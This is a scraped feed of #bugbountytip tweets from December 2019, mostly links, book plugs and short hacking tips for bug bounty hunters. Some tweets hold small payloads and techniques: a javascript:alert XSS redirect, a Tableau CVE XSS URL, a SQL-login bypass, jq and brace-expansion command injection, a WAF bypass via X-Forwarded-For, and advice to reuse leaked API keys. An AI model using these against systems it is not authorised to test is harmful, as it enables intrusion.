0 @iagox86 Tools - Padbuster Poracle Ciphers - CAST-cbc aes-128-cbc aes-192-cbc aes-256-cbc bf-cbc camellia-128-cbc camellia-192-cbc camellia-256-cbc cast-cbc cast5-cbc des-cbc des-ede-cbc des-ede3-cbc desx-cbc rc2-40-cbc rc2-64-cbc rc2-cbc seed-cbc #bugbountytip #bugbountytips 2/2
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:42:02
0 DECRYPT CIPHER WITHOUT THE KEY Padding Oracle Attack in Detail by Ron Bowes @iagox86 Explanation https://t.co/KWuU3SruSj An Example https://t.co/u0DcQnqa0o Encrypt data https://t.co/NnH2sXuoXT Practice https://t.co/xtgWVCO63p #Pastebin #bugbountytip #bugbountytips (1/2)
ghostlulz
@ghostlulz1337


2019-12-21 02:32:20
8 Wayback SQL Scanner - https://t.co/IcaV2mPjQV Swagger API - https://t.co/5toTZrRmdz New Robots.txt - https://t.co/IsyaPyECWG CSV Injection - https://t.co/loAf6mRXft XXE - https://t.co/vhpq7Bjg4d #BugBounty #bugbountytips #bugbountytip #infosec #osint #xss #appsec #hacking https://t.co/DGkhLNFata
Tarek Mohammed
@Conan0x3


2019-12-20 21:05:46
0 - Get a slack notification from "Monitorizer" about new sub-domains for a target - Found sub-domain for splunk enterprise - Search exploits for current version - Found CVE allow to disclose the server info along with product license key :D #bugbountytip #BugBounty https://t.co/fULk1BZbwP
Inon Shkedy
@InonShkedy


2019-12-20 01:50:06
2 Pentest for APIs? Leverage the predictable nature of REST APIs to find admin API endpoints! For example, if you saw the following API call: GET /api/v1/users/<id> Give it a chance, and change to DELETE / POST to create / delete users. #bugbountytip #bugbounty
Jesse Clark
@Hogarth45_ND


2019-12-19 23:12:22
1 On @Hacker0x01 use the Scope Version page to be ensured you are seeing the entire scope for program. Some times you can find several domains listed that are not reflected on the regular policy page. #bugbountytip https://t.co/9aHu40ON8I
Kenan
@h1_kenan


2019-12-19 21:59:09
0 It is time! https://t.co/oVgbVlEwQj #XSS #hacking #security #bugbountytip Please RT if you like. thanks
Yadhavi
@PrincessYadhavi


2019-12-19 18:44:19
2 "$HOME/bugbounty/paltform(ht,bugcrowd,etc)/program(verizonmedia)/target(yahoo)/target(com)(if scope has multiple TLDs)/date(dec-20)/tool(masscan)/filename (with toolname to easily identify)(yahoo.com-masscan.txt)" #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2019-12-19 18:39:53
0 Use same directory structure on all of your systems.(windows, kali vm, vps). It'll save a lot of time. my directory structure for masscan on yahoo: "$HOME/bugbounty/h1/verzionmedia/yahoo/com/dec-20/masscan/yahoo.com-masscan.txt" #bugbountytips #bugbounty #bugbountytip
Apoorv Raj Saxena
@secxena


2019-12-19 16:02:04
1 I just published CredCheckโ€Šโ€”โ€ŠA credential Pentesting framework #bugbountytool #bugbounty #bugbountytip #Section144 https://t.co/zVlMCiIhpN
ak1t4 ๐Ÿ‡ฆ๐Ÿ‡ท
@akita_zen


2019-12-19 15:52:43
1 #bugbountytip: The Program always has the last word, Not the Triaging Analyst. Keep pushing until program security team ping you with a "clear" feedback. *Most of triagers/analyst prioritizes customers than bugbounty hunters , even when your report is valid. #bugbounty #infosec
Sebastian Wieseler
@kickino


2019-12-19 14:13:45
0 Second subdomain takeover within a few days. ๐Ÿฅณ๐Ÿฅณ The bugs are all around. Theyโ€™re just waiting for you to find them ๐Ÿ˜๐Ÿ˜ #bugbounty #bugbountytip #togetherwehitharder
Sanketh Sharath
@sharathsanketh


2019-12-19 13:38:04
3 After 6 months of bug hunting, i have taken a step back to pause and go back to reading and training (labs) this month. On reading again, I realised I didn't know shit about shit. Learning never ends. I really recommend newbies do this! #bugbounty #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2019-12-19 11:56:28
0 Parameter Pollution #bugbountytips #bugbountytip #bugbounty https://t.co/UolTrcx2q8
Fisher
@Regala_


2019-12-19 09:13:28
0 Actually, here's my top tip for writing a good report: you should be able to follow and reproduce the steps on YOUR own report after some time has passed #bugbounty #bugbountytip
d0nut
@d0nutptr


2019-12-19 01:03:37
0 @John08369305 @uraniumhacker @intigriti You might say โ€œthen teach them!โ€ Which I have more than most... but even the people Iโ€™ve spent hours on donโ€™t seem to โ€œget itโ€. Then they go around bringing others down with their misunderstandings. Just look at #bugbountytip . Like half of these are garbage.
mohsin khan
@mohsink83789226


2019-12-18 16:57:34
0 Please share web pentesting resources with me #bug #bugbountytips #bugbountytip #hacking #Hacker #bountyhunter #bounty
Rafin Rahman Chy
@rafinrahmanchy


2019-12-18 14:06:23
6 Required Skills for Facebook Bug Bounty *Web App Pentesting *Facebook API *graphQL *Burp Suite *Studying PoCs #BugBounty #bugbountytip #bugbountytips #EthicalHacker #EthicalHacking #Hacking #Hacker #Hackers #InfoSec #Infosecurity #ITsecurity #ITSec #netsec #appsec #websecurity https://t.co/AprGSWj64P
0x8hany
@Haniawad


2019-12-18 02:25:10
5 As @zseano always saying lazy developer reuse the code :) #BugBounty #bugbountytip https://t.co/NKfPRcd5f0
ghostlulz
@ghostlulz1337


2019-12-17 21:27:13
7 SQL injection is one of the most popular vulnerabilities out there yet there seems to be a lack of people who can identify this flaw in an applications source code. More info on by blog: https://t.co/m5K3yzo6iU #BugBounty #bugbountytip #bugbountytips #infosec #xss #sqli #osint https://t.co/BeKWOSmNpY
Fisher
@Regala_


2019-12-17 15:31:24
2 Flexing of the day ๐Ÿ˜‡ (impact took a beating) If you need help/tips -> reply below with SPECIFIC questions other than where to start, how to get crit, etc #bugbountytip https://t.co/GGpecf900H
Dhamu
@Dhamu_offi


2019-12-17 10:44:05
1 #bugbountytip #bugbounty Abusing feature to steal your tokens https://t.co/jN2AvQDQ7i
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 10:20:33
2 Best guideline to become a Web Application Security Researcher in my opinion https://t.co/uVslvJiX80 #EthicalHacking #EthicalHacker #Hacking #Hacker #WebSecurity #BugBounty #bugbountytip #bugbountytips #netsec #AppSec #InfoSec #ITsecurity #CyberSecurity #Pentesting #pentest
Dhamu
@Dhamu_offi


2019-12-17 10:17:30
7 #bugbountytip #bugbounty Hacking GitHub with Unicode's dotless 'I'. #Vulnerability: Password reset emails delฤฑvered to the wrong address. https://t.co/VKRlN2AxdH
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 09:33:35
5 Facebook Bug Bounty Resources by Philippe Harewood https://t.co/bpGdyUXc98 #Facebook #FB #BugBounty #bugbountytip #bugbountytips #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #WhiteHatHackers #AppSec #InfoSec #ITSecurity #CyberSecurity #Pentesting #Pentest https://t.co/hXoBqe1G5V
Avanish Pathak
@avanish46


2019-12-17 03:18:52
3 I earned $750 on @Bugcrowd . Capture the Account Creation Request On BurpSuite, Most of the case you'll find the redirect request in burp but not on the web : - [ https.//www.TARGET.com/account-created?redirectUrl=javascript:alert(document.cookie)// ] #bugbounty #bugbountytip https://t.co/Mxy2TieMIh
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-17 00:38:05
7 113 #OSINT TIPS created by me and the number of tips will get higher every day until it reach 1000 tips. New Updates. https://t.co/gNMSDGULS6 #Hacking #PenTest #bugbountytips #redteam #CyberSecurity #infosec #bugbountytip
Tirtha Mandal
@tirtha_mandal


2019-12-16 23:01:04
1 First time I successfully reproduced HTTP Dsync attack on a bug bounty program. Thank you @synack @SynackRedTeam ๐Ÿคฉ๐Ÿ˜ #synack #srt #redteam #bugbountytip #httpdsync https://t.co/zlPjFgXbHS
Ben Tai
@ben_tby


2019-12-16 21:07:28
4 Just a few days before I was simultaneously celebrating my first and second reward, and today I'm proudly celebrating my third reward. Thank you, @Hacker0x01 #BugBounty #bugbountytip #Hacking https://t.co/CcftdtdQya https://t.co/aADPguvhzk
bugbountytip
@a_l_e_r_t_1_


2019-12-16 18:05:36
0 https://t.co/pjFDcvvJCX i'm newbie on bug bounty. When i working i'm streamming on twitch. Please check my channel and follow me ๐Ÿ˜‚. #bugbountytip #bugbounytips
Simpliv
@simplivllc


2019-12-16 16:00:07
1 This Self-paced Course Teaches You In Detail About [Ethical Hacking] Click Here To Sign Up #Hacking #Cybersecurity #bugbountytip #networking @StartGrowthHack @cry__pto @Pavandep8 @simplivllc https://t.co/6Q7g0olioK https://t.co/qEolSxBN7w
bug bounty tips - Retweet
@BugbountytipsR


2019-12-16 15:23:05
0 SQLi Without Quotes One of the BEST and SIMPLE BYPA$$ by @rodoassis username = \ password = INPUT2 SELECT * FROM login WHERE username = '{\' AND password = }'$INPUT2'; Part inside { } is considered as string https://t.co/mVDuuArf5Z #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-16 14:51:19
0 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. ๐Ÿ’ฐHUGE KNOWLEDGE DROP ๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/8tbkOCbFgM
Evgeny Larin
@godexmachine


2019-12-16 13:15:39
0 You can identify the Laravel framework by laravel_session cookie, then make a potential illegal request like POST, PUT, etc to check if debug mode is enabled. #BugBountyTip #BugBounty
TomNomNom
@TomNomNom


2019-12-16 11:00:27
9 If you need an element other than <a> for DOM Clobbering (i.e. one that returns an attribute value instead of '[Object HTMLElement]' when you call .toString() on it), you can use <area> with an href attribute #bugBountyTip https://t.co/YCSMhhPK61
noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat โœช
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect not occurs but there are hints that this could work in particular cases, don't give up and continues fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. ๐Ÿ’ฐHUGE KNOWLEDGE DROP ๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan ๐Ÿ‡ฎ๐Ÿ‡ณ
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK
แด‚
@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd
แด‚
@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href if these js codes are going into any sink without encoding it's Dom XSS E.g var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping ๐Ÿ˜ด #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience โ€“ not luck โ€“ to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPOND of SERVER INTERCEPT RESPOND CHANGE IT use BURP Changed Respond to Bypass Auththentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSS๐ŸŽ‰๏ธ #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne๐Ÿง
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayersBe sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreamsโ›ท๏ธ, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everwhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D ฮž ฮž P ฮ› K โš™๏ธ
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didnโ€™t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, donโ€™t question reason, just do it. Trust me, youโ€™ll like it. I love you and you love me, then go do it. Subscribe, itโ€™s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 i reported a critical bug in a 3rd party website company confirmed that this is critical even if is out of scope ,HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 ๐Ÿ˜Ÿ
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper ๐Ÿ’ป
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 16:21:04
4 ๐Ÿ†๐Ÿ†Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? ๐Ÿ”’๐Ÿ˜ Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me sand save time looking for XSS manually. https://t.co/4ppKTLDCeN
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 08:47:33
0 ๐Ÿ’ฐKeep Following Us ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi โ€” Tutorial Coming Soon ๐Ÿ’ฐ๐Ÿ’ฐ Keep Following Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Comming Soon ! Keep Following ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If youโ€™re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 firebase database Itโ€™s one of the easier win for #BugBoundy you can easily look for it on google using Site:.firebaseio.com/.json but google doesnโ€™t give you results but if use bing you can get results Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimbleโ€™s Privacy Model Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflareโ€™s Lightweight Network Vulnerability Scanner -- Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-07 23:54:02
2 i have finished building my github repository which talk about #OSINT.a very important repository for ethical hackers and and #BugBounty hunters and of course #OSINT lovers the repository for now contain 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ลžAHฤฐN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeRโ˜ข
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures ๐Ÿ˜“
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks ๐Ÿฆž Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
